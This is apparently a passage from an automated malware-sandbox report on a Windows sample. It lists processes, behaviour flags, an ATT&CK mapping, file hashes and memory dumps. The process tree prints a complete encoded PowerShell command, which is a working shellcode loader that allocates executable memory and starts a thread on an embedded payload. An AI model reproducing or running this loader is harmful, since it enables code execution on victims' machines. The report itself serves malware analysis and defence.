AAeAA0AGEALAAwAHgAYQBiACwAMAB4AGMAYQAsADAAeAA2AGEALAAwAHgAZgBiACwAMAB4AGMAOQAsADAAeAAxADQALAAwAHgANAA3ACwAMAB4ADcAOQAsADAAeABjAGQALAAwAHgAOQBmACwAMAB4AGEAYQAsADAAeAAwADkALAAwAHgAYwA5ACwAMAB4ADUAZQAsADAAeABmADcALAAwAHgAOABiACwAMAB4ADEANgAsADAAeAAxADUALAAwAHgAMQAyACwAMAB4AGMAYgAsADAAeAA1ADUALAAwAHgAOAA5ACwAMAB4ADMANAAsADAAeAA5ADEALAAwAHgAYQA2ACwAMAB4AGMAOQAsADAAeAAzAGIALAAwAHgAMQBjACwAMAB4ADMANAAsADAAeAA0ADUALAAwAHgAZQBkACwAMAB4ADgAOQAsADAAeABmADIALAAwAHgAYwBhACwAMAB4ADkAYQAsADAAeAA3ADkALAAwAHgAOABiACwAMAB4ADcAZgAsADAAeAA3ADIALAAwAHgAMQA5ACwAMAB4ADAAOAAsADAAeAA4ADAAOwAkAGcAIAA9ACAAMAB4ADEAMAAwADAAOwBpAGYAIAAoACQAegAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwAHgAMQAwADAAMAApAHsAJABnACAAPQAgACQAegAuAEwAZQBuAGcAdABoAH0AOwAkAHcANwBPAD0AJAB3ADoAOgBWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoADAALAAwAHgAMQAwADAAMAAsACQAZwAsADAAeAA0ADAAKQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAoACQAegAuAEwAZQBuAGcAdABoAC0AMQApADsAJABpACsAKwApACAAewAkAHcAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJAB3ADcATwAuAFQAbwBJAG4AdAAzADIAKAApACsAJABpACkALAAgACQAegBbACQAaQBdACwAIAAxACkAfQA7ACQAdwA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAAsACQAdwA3AE8ALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ADsAKQB7AFMAdABhAHIAdAAtAHMAbABlAGUAcAAgADYAMAB9ADsAJwA7ACQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAQgB5AHQAZQBzACgAJAB0AHIAMABwACkAKQA7ACQAegBJADcAIAA9ACAAIgAtAGUAbgBjACAAIgA7AGkAZgAoAFsASQBuAHQAUAB0AHIAXQA6ADoAUwBpAHoAZQAgAC0AZQBxACAAOAApAHsAJABNAFMAWQAgAD0AIAAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAAgACsAIAAiAFwAcwB5AHMAdwBvAHcANgA0AFwAVwBpAG4AZABvAHcAcwBQAG8AdwBlAHIAUwBoAGUAbABsAFwAdgAxAC4AMABcAHAAbwB3AGUAcgBzAGgAZQBsAGwAIgA7AGkAZQB4ACAAIgAmACAAJABNAFMAWQAgACQAegBJADcAIAAkAGUAIgB9AGUAbABzAGUAewA7AGkAZQB4ACAAIgAmACAAcABvAHcAZQByAHMAaABlAGwAbAAgACQAegBJADcAIAAkAGUAIgA7AH0A
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1356
  - - C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" -enc JABVAGQAegBiACAAPQAgACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnADsAJAB3ACAAPQAgAEEAZABkAC0AVAB5AHAAZQAgAC0AbQBlAG0AYgBlAHIARABlAGYAaQBuAGkAdABpAG8AbgAgACQAVQBkAHoAYgAgAC0ATgBhAG0AZQAgACIAVwBpAG4AMwAyACIAIAAtAG4AYQBtAGUAcwBwAGEAYwBlACAAVwBpAG4AMwAyAEYAdQBuAGMAdABpAG8AbgBzACAALQBwAGEAcwBzAHQAaAByAHUAOwBbAEIAeQB0AGUAWwBdAF0AOwBbAEIAeQB0AGUAWwBdAF0AJAB6ACAAPQAgADAAeABiADgALAAwAHgAOQA2ACwAMAB4ADYAMwAsADAAeAA2ADcALAAwAHgAOQA0ACwAMAB4AGQAYgAsADAAeABkAGMALAAwAHgAZAA5ACwAMAB4ADcANAAsADAAeAAyADQALAAwAHgAZgA0ACwAMAB4ADUAZQAsADAAeAAyAGIALAAwAHgAYwA5ACwAMAB4AGIAMQAsADAAeAA1AGUALAAwAHgAOAAzACwAMAB4AGUAZQAsADAAeABmAGMALAAwAHgAMwAxACwAMAB4ADQANgAsADAAeAAxADEALAAwAHgAMAAzACwAMAB4ADQANgAsADAAeAAxADEALAAwAHgAZQAyACwAMAB4ADYAMwAsADAAeAA5AGYALAAwAHgAOABmACwAMAB4ADEAYgAsADAAeAA4AGIALAAwAHgANgAwACwAMAB4ADUAMAAsADAAeAA0ADQALAAwAHgAYgBhACwAMAB4AGIAMgAsADAAeAAzADQALAAwAHgAMABmACwAMAB4AGUAZQAsADAAeAAwADIALAAwAHgAMwBlACwAMAB4ADUAZAAsADAAeAAwADIALAAwAHgAZQBhACwAMAB4AGEANQAsADAAeABlADkALAAwAHgANAA4ACwAMAB4AGYAOAAsADAAeAAyAGEALAAwAHgANQA5ACwAMAB4ADIANgAsADAAeAAyADYALAAwAHgAMAA0ACwAMAB4ADUAYQAsADAAeAAzAGQALAAwAHgANQA0ACwAMAB4ADQAZQAsADAAeAA5ADUALAAwAHgAOAAxACwAMAB4ADMANQAsADAAeABiADIALAAwAHgAYgA0ACwAMAB4ADcAZAAsADAAeAA0ADQALAAwAHgAZQA3ACwAMAB4ADEANgAsADAAeABiAGMALAAwAHgAOAA3ACwAMAB4AGYAYQAsADAAeAA1ADcALAAwAHgAZgA5ACwAMAB4ADUAMQAsADAAeAA3ADAALAAwAHgAYgA3ACwAMAB4ADUANwAsADAAeABlADkALAAwAHgAMgA4ACwAMAB4ADUANwAsADAAeAAwADAALAAwAHgANgA2ACwAMAB4ADgAZQAsADAAeAA2AGIALAAwAHgAYQBmACwAMAB4AGEAOAAsADAAeAA4ADQALAAwAHgAZAA0ACwAMAB4AGQANwAsADAAeABjAGQALAAwAHgANQBiACwAMAB4AGEAMAAsADAAeAA2AGIALAAwAHgAYwBmACwAMAB4ADgAYgAsADAAeABjADIALAAwAHgAMgBiACwAMAB4AGUAZgAsADAAeAA3AGIALAAwAHgAZAA0ACwAMAB4ADEAOAAsADAAeAA2ADQALAAwAHgAMwAzACwAMAB4AGMAZQAsADAAeAAxAGIALAAwAHgAYgAyACwAMAB4AGIAMAAsADAAeABkADIALAAwAHgAMQAyACwAMAB4AGIAYQAsADAAeAA3ADAALAAwAHgAYQAwACwAMAB4ADYAMAAsADAAeABjAGYALAAwAHgAOAAyACwAMAB4ADYAMAAsADAAeABiADkALAAwAHgAMABmACwAMAB4ADIAOAAsADAAeAA0AGQALAAwAHgANwA2ACwAMAB4ADgAMgAsADAAeAAzADAALAAwAHgAOAA5ACwAMAB4AGIAMAAsADAAeAA3AGQALAAwAHgANAA3ACwAMAB4AGUAMQAsADAAeABjADMALAAwAHgAMAAwACwAMAB4ADUAMAAsADAAeAAzADIALAAwAHgAYgBlACwAMAB4AGQAZQAsADAAeABkADUALAAwAHgAYQA1ACwAMAB4ADEAOAAsADAAeAA5ADQALAAwAHgANABlACwAMAB4ADAAMgAsADAAeAA5ADkALAAwAHgANwA5ACwAMAB4ADAAOAAsADAAeABjADEALAAwAHgAOQA1ACwAMAB4ADMANgAsADAAeAA1AGUALAAwAHgAOABkACwAMAB4AGIAOQAsADAAeABjADkALAAwAHgAYgAzACwAMAB4AGEANQAsADAAeABjADUALAAwAHgANAAyACwAMAB4ADMAMgAsADAAeAA2AGEALAAwAHgANABjACwAMAB4ADEAMAAsADAAeAAxADEALAAwAHgAYQBlACwAMAB4ADEANQAsADAAeABjADIALAAwAHgAMwA4ACwAMAB4AGYANwAsADAAeABmADMALAAwAHgAYQA1ACwAMAB4ADQANQAsADAAeABlADcALAAwAHgANQBiACwAMAB4ADEAOQAsADAAeABlADAALAAwAHgANgAzACwAMAB4ADQAOQAsADAAeAA0AGMALAAwAHgAOQA0ACwAMAB4ADgAYgAsADAAeAA5ADIALAAwAHgANwAxACwAMAB4AGMAOAAsADAAeAAxAGIALAAwAHgAMAAyACwAMAB4AGUAYgAsADAAeAA4ADcALAAwAHgAZABiACwAMAB4AGIAMgAsADAAeAA4ADQALAAwAHgAMABlACwAMAB4AGIAMgAsADAAeAAyAGIALAAwAHgAMwBmACwAMAB4AGIAOQAsADAAeAAwADYALAAwAHgAZABjACwAMAB4ADkAOQAsADAAeAAzAGUALAAwAHgANgA4ACwAMAB4AGYANwAsADAAeABkADcALAAwAHgAOQBiACwAMAB4AGMANQAsADAAeABhADQALAAwAHgANAA0ACwAMAB4ADQAZgAsADAAeABiADkALAAwAHgAMgAyACwAMAB4ADUAMQAsADAAeAAzADkALAAwAHgANAA0ACwAMAB4ADEANQAsADAAeAA1AGEALAAwAHgAMQAwACwAMAB4AGUANQAsADAAeAAwAGEALAAwAHgAYwBmACwAMAB4ADkAOAAsADAAeAA1ADkALAAwAHgAZgBmACwAMAB4ADYANwAsADAAeAA2AGEALAAwAHgANAAyACwAMAB4AGYAZgAsADAAeAA3ADcALAAwAHgANwBjACwAMAB4AGUAMQAsADAAeABmAGYALAAwAHgANwA3ACwAMAB4ADcAYwAsADAAeAAzADUALAAwAHgAOQAzACwAMAB4ADMAYgAsADAAeAAzAGYALAAwAHgAMABlACwAMAB4ADIAMQAsADAAeABhADgALAAwAHgAZQA5ACwAMAB4AGQAZQAsADAAeABjAGQALAAwAHgANgAwACwAMAB4ADcAZAAsADAAeABiADAALAAwAHgANgAyACwAMAB4AGQAMgAsADAAeABlAGEALAAwAHgANwBhACwAMAB4ADIAOAAsADAAeAA5AGIALAAwAHgAOQBmACwAMAB4AGMAMAAsADAAeABhAGEALAAwAHgANAA0ACwAMAB4ADMAYQAsADAAeABiADEALAAwAHgAMQA4ACwAMAB4AGUAMgAsADAAeABlAGQALAAwAHgANgBlACwAMAB4AGYAMQAsADAAeABmADQALAAwAHgANAAxACwAMAB4AGYAOQAsADAAeAA1AGUALAAwAHgANwBjACwAMAB4AGYAZQAsADAAeAAzAGYALAAwAHgAOQBmACwAMAB4AGEAYgAsADAAeAA4ADgALAAwAHgAMAA2ACwAMAB4ADAAYwAsADAAeAAzAGMALAAwAHgAOABiACwAMAB4ADgANAAsADAAeABkAGEALAAwAHgAMwA4ACwAMAB4AGQAOAAsADAAeABkAGIALAAwAHgANAA5ACwAMAB4ADEANgAsADAAeAA4AGMALAAwAHgAOABkACwAMAB4ADAANQAsADAAeAA3ADMALAAwAHgANgA3ACwAMAB4ADEAYwAsADAAeABlAGUALAAwAHgANwBjACwAMAB4ADUAZAAsADAAeABmADYALAAwAHgANwBhACwAMAB4ADgAOQAsADAAeAAwADEALAAwAHgAYQA0ACwAMAB4ADIAOQAsADAAeABkAGUALAAwAHgAZQBlACwAMAB4ADEAYwAsADAAeABhADUALAAwAHgAYwBkACwAMAB4ADEANgAsADAAeABiADkALAAwAHgANABlACwAMAB4AGYAMQAsADAAeABjADIALAAwAHgAMwBjACwAMAB4ADcAMAAsADAAeAA3ADgALAAwAHgAZgBiACwAMAB4ADUANgAsADAAeABmADgALAAwAHgAOQAwACwAMAB4ADAAMwAsADAAeABhADcALAAwAHgAOQAwACwAMAB4AGQAMgAsADAAeABmADMALAAwAHgAOQAyACwAMAB4ADgAMAAsADAAeAAyADQALAAwAHgAMgA2ACwAMAB4ADkAMwAsADAAeAAzADUALAAwAHgAMwBhACwAMAB4AGEAMQAsADAAeABkAGMALAAwAHgAMAAwACwAMAB4ADEAZQAsADAAeAA2ADQALAAwAHgAZQAyACwAMAB4AGIAZgAsADAAeAAzADUALAAwAHgAYwA5ACwAMAB4ADcANAAsADAAeAAzAGYALAAwAHgAZABhACwAMAB4AGMAOQAsADAAeAA4ADQALAAwAHgANQA3ACwAMAB4AGQAYQAsADAAeABjADkALAAwAHgAYwA0ACwAMAB4AGEANwAsADAAeAA4ADkALAAwAHgAYQAxACwAMAB4ADkAYwAsADAAeAAwADMALAAwAHgANwBlACwAMAB4AGQANwAsADAAeABlADIALAAwAHgAOQBlACwAMAB4ADEAMgAsADAAeAA0ADQALAAwAHgANABlACwAMAB4AGEAOQAsADAAeABmADIALAAwAHgAMwBjACwAMAB4ADEAOAAsADAAeABhADkALAAwAHgAZABjACwAMAB4AGMAMgAsADAAeABkADgALAAwAHgAZgBhACwAMAB4ADQAYQAsADAAeABhAGIALAAwAHgAYwBhACwAMAB4ADYAYQAsADAAeABmAGIALAAwAHgAYwA5ACwAMAB4ADEANAAsADAAeAA0ADcALAAwAHgANwA5ACwAMAB4AGMAZAAsADAAeAA5AGYALAAwAHgAYQBhACwAMAB4ADAAOQAsADAAeABjADkALAAwAHgANQBlACwAMAB4AGYANwAsADAAeAA4AGIALAAwAHgAMQA2ACwAMAB4ADEANQAsADAAeAAxADIALAAwAHgAYwBiACwAMAB4ADUANQAsADAAeAA4ADkALAAwAHgAMwA0ACwAMAB4ADkAMQAsADAAeABhADYALAAwAHgAYwA5ACwAMAB4ADMAYgAsADAAeAAxAGMALAAwAHgAMwA0ACwAMAB4ADQANQAsADAAeABlAGQALAAwAHgAOAA5ACwAMAB4AGYAMgAsADAAeABjAGEALAAwAHgAOQBhACwAMAB4ADcAOQAsADAAeAA4AGIALAAwAHgANwBmACwAMAB4ADcAMgAsADAAeAAxADkALAAwAHgAMAA4ACwAMAB4ADgAMAA7ACQAZwAgAD0AIAAwAHgAMQAwADAAMAA7AGkAZgAgACgAJAB6AC4ATABlAG4AZwB0AGgAIAAtAGcAdAAgADAAeAAxADAAMAAwACkAewAkAGcAIAA9ACAAJAB6AC4ATABlAG4AZwB0AGgAfQA7ACQAdwA3AE8APQAkAHcAOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsADAAeAAxADAAMAAwACwAJABnACwAMAB4ADQAMAApADsAZgBvAHIAIAAoACQAaQA9ADAAOwAkAGkAIAAtAGwAZQAgACgAJAB6AC4ATABlAG4AZwB0AGgALQAxACkAOwAkAGkAKwArACkAIAB7ACQAdwA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkAHcANwBPAC4AVABvAEkAbgB0ADMAMgAoACkAKwAkAGkAKQAsACAAJAB6AFsAJABpAF0ALAAgADEAKQB9ADsAJAB3ADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJAB3ADcATwAsADAALAAwACwAMAApADsAZgBvAHIAIAAoADsAOwApAHsAUwB0AGEAcgB0AC0AcwBsAGUAZQBwACAANgAwAH0AOwA=
      4⤵
      Blocklisted process makes network request
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:1996
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\_j0qxxsl.cmdline"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2980
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBF1C.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCBF1B.tmp"
        6⤵
        
        PID:1080
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
        
        dw20.exe -x -s 1364
        5⤵
        Suspicious behavior: GetForegroundWindowSpam
        
        PID:1716

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RESBF1C.tmp

Filesize
1KB

MD5
cbf91faf6d69a73fd038d03ff3ab724e

SHA1
87152a4a0f24c2207e18d3700af09f5b58db4503

SHA256
a3fdfbc7f1084d662bc4cc45b74ff3dce442adf2e9754014057ae505924b6a11

SHA512
2178a11a1a9cf7d02478cbcb70266c157a6142dde4ce70dabb1af8b7e141a2748309ea09e481b188b2ebb6e1509fca5ee3292b14cc55fc80d35b81fc8e1a3f8d

Download Submit
C:\Users\Admin\AppData\Local\Temp\_j0qxxsl.dll

Filesize
3KB

MD5
b3417acd2d1048a6496244e311c6d4a4

SHA1
da4347ed680e0a65f9e82fa614f2a3a2701560cd

SHA256
8995a65d50130f48eeed5aede74aa93a1dabc0571763e15f4ed65610a2a71234

SHA512
8e51b691a5f2e5722f4def392b851f62d0eb6adc78fdc3bf4bf9096e61ae7b136b985e0c575312ce3de7dac4e2c7003a725d577eecf5f7ac340cf6eff8faed21

Download Submit
C:\Users\Admin\AppData\Local\Temp\_j0qxxsl.pdb

Filesize
7KB

MD5
2bfdc65e21baadf923cd443adef2e597

SHA1
af68cfa064f7223a3b1b1e80ee42f422ddb35a8a

SHA256
458e8104c785ba8533aad591511ebd8e48d8dfc3d86c70ca1204375806331544

SHA512
3b1c0f7c96174fd4a947d374355ce70bfc13141a5298a9ef6f8072f95ba5861eaadb1a37f69852e4caa65fabfd7088d2aa9e60c027340fa075c43dc4b7c2f148

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
b225ed2747662aa9f281319544c47845

SHA1
44f7b6170e8abf7a982ed567c8cb26a4f36ed973

SHA256
8d9c13629a65752d985f576de226adc703853b24a91a38ba30a47adcf11207d7

SHA512
c33a029149eed5b1991f41fff7831ae6f11824951031470e363561fb035d5f958258a3a9055df91b0fa29b3b250a85f07816ddfc1b0578823e3eab7e629914cc

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\J633AC9N25EOUG4LZDYS.temp

Filesize
7KB

MD5
b225ed2747662aa9f281319544c47845

SHA1
44f7b6170e8abf7a982ed567c8cb26a4f36ed973

SHA256
8d9c13629a65752d985f576de226adc703853b24a91a38ba30a47adcf11207d7

SHA512
c33a029149eed5b1991f41fff7831ae6f11824951031470e363561fb035d5f958258a3a9055df91b0fa29b3b250a85f07816ddfc1b0578823e3eab7e629914cc

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSCBF1B.tmp

Filesize
652B

MD5
76abc24a3b8b0405854eee5b16f971b6

SHA1
0fd1d8027da16f9b656e06b40da60cda305e6737

SHA256
7e868caa7647bc98220d21b5d7561074a4f849c85e81f81ab03d92f8230e0f1e

SHA512
f751b5ac96a15ce51c6d6547cb110030f439070d3c66cb71490644292729f5e5dd881c7bcb0da2afc311d47d3cfc5ec53912dfd546bed89b5dd46e9dddbb9010

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\_j0qxxsl.0.cs

Filesize
557B

MD5
7319070c34daa5f6f2ece2dfc07119ee

SHA1
f26a4a48518a5608e93c8b77368f588b0433973c

SHA256
b240a9bb4f72d886522e19fa40b9c688fa94c1bd6dc7b7185f94e4466273a5dc

SHA512
34169fc9fb0cd2381c45efcd22ec1bc659ef513e73bc4c7bcb91ca1d5129a1a149e9f75297acb4958e52ff04d75e6e121232dbc0657611e41b63f10aa3e1d6bd

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\_j0qxxsl.cmdline

Filesize
309B

MD5
a50124538a3c9e613623756feaef8d12

SHA1
7ec7faac886c69833ebb42cd7c3b84f13757aae4

SHA256
c2ab0efb3d4adf1bca1851809cb06b73a5c549780a8e1bb92a4302d5734c59a9

SHA512
b3bc111f2bf04c2cc7087999718b28d32dcea92bbe0b073b7e47a04c657c7af754f070be56d7fca2c5c2c24be8f9f9a321b21dacecf23000443b8468ba719240

Download Submit
memory/1356-72-0x0000000002920000-0x00000000029A0000-memory.dmp

Filesize
512KB

Download
memory/1356-90-0x000007FEF5850000-0x000007FEF61ED000-memory.dmp

Filesize
9.6MB

Download
memory/1356-71-0x000007FEF5850000-0x000007FEF61ED000-memory.dmp

Filesize
9.6MB

Download
memory/1356-107-0x0000000002920000-0x00000000029A0000-memory.dmp

Filesize
512KB

Download
memory/1356-108-0x0000000002920000-0x00000000029A0000-memory.dmp

Filesize
512KB

Download
memory/1356-74-0x000007FEF5850000-0x000007FEF61ED000-memory.dmp

Filesize
9.6MB

Download
memory/1356-75-0x0000000002920000-0x00000000029A0000-memory.dmp

Filesize
512KB

Download
memory/1356-76-0x0000000002920000-0x00000000029A0000-memory.dmp

Filesize
512KB

Download
memory/1356-77-0x0000000002920000-0x00000000029A0000-memory.dmp

Filesize
512KB

Download
memory/1356-110-0x0000000002920000-0x00000000029A0000-memory.dmp

Filesize
512KB

Download
memory/1356-105-0x0000000002920000-0x00000000029A0000-memory.dmp

Filesize
512KB

Download
memory/1716-114-0x0000000002500000-0x0000000002501000-memory.dmp

Filesize
4KB

Download
memory/1716-115-0x0000000002500000-0x0000000002501000-memory.dmp

Filesize
4KB

Download
memory/1996-82-0x0000000002960000-0x00000000029A0000-memory.dmp

Filesize
256KB

Download
memory/1996-83-0x0000000002960000-0x00000000029A0000-memory.dmp

Filesize
256KB

Download
memory/1996-113-0x0000000006300000-0x0000000006700000-memory.dmp

Filesize
4.0MB

Download
memory/1996-112-0x0000000002960000-0x00000000029A0000-memory.dmp

Filesize
256KB

Download
memory/1996-81-0x0000000073200000-0x00000000737AB000-memory.dmp

Filesize
5.7MB

Download
memory/1996-111-0x0000000073200000-0x00000000737AB000-memory.dmp

Filesize
5.7MB

Download
memory/1996-80-0x0000000073200000-0x00000000737AB000-memory.dmp

Filesize
5.7MB

Download
memory/1996-109-0x0000000002840000-0x0000000002841000-memory.dmp

Filesize
4KB

Download
memory/1996-106-0x0000000002840000-0x0000000002841000-memory.dmp

Filesize
4KB

Download
memory/2252-54-0x0000000000400000-0x0000000000423000-memory.dmp

Filesize
140KB

Download
memory/2580-62-0x0000000002BA0000-0x0000000002C20000-memory.dmp

Filesize
512KB

Download
memory/2580-103-0x0000000002BA0000-0x0000000002C20000-memory.dmp

Filesize
512KB

Download
memory/2580-104-0x0000000002BA0000-0x0000000002C20000-memory.dmp

Filesize
512KB

Download
memory/2580-102-0x0000000002BA0000-0x0000000002C20000-memory.dmp

Filesize
512KB

Download
memory/2580-101-0x0000000002BA0000-0x0000000002C20000-memory.dmp

Filesize
512KB

Download
memory/2580-59-0x000000001B2F0000-0x000000001B5D2000-memory.dmp

Filesize
2.9MB

Download
memory/2580-60-0x0000000001DE0000-0x0000000001DE8000-memory.dmp

Filesize
32KB

Download
memory/2580-61-0x000007FEF5850000-0x000007FEF61ED000-memory.dmp

Filesize
9.6MB

Download
memory/2580-70-0x0000000002BA0000-0x0000000002C20000-memory.dmp

Filesize
512KB

Download
memory/2580-63-0x0000000002BA0000-0x0000000002C20000-memory.dmp

Filesize
512KB

Download
memory/2580-64-0x0000000002BA0000-0x0000000002C20000-memory.dmp

Filesize
512KB

Download
memory/2580-84-0x000007FEF5850000-0x000007FEF61ED000-memory.dmp

Filesize
9.6MB

Download
memory/2580-73-0x000007FEF5850000-0x000007FEF61ED000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads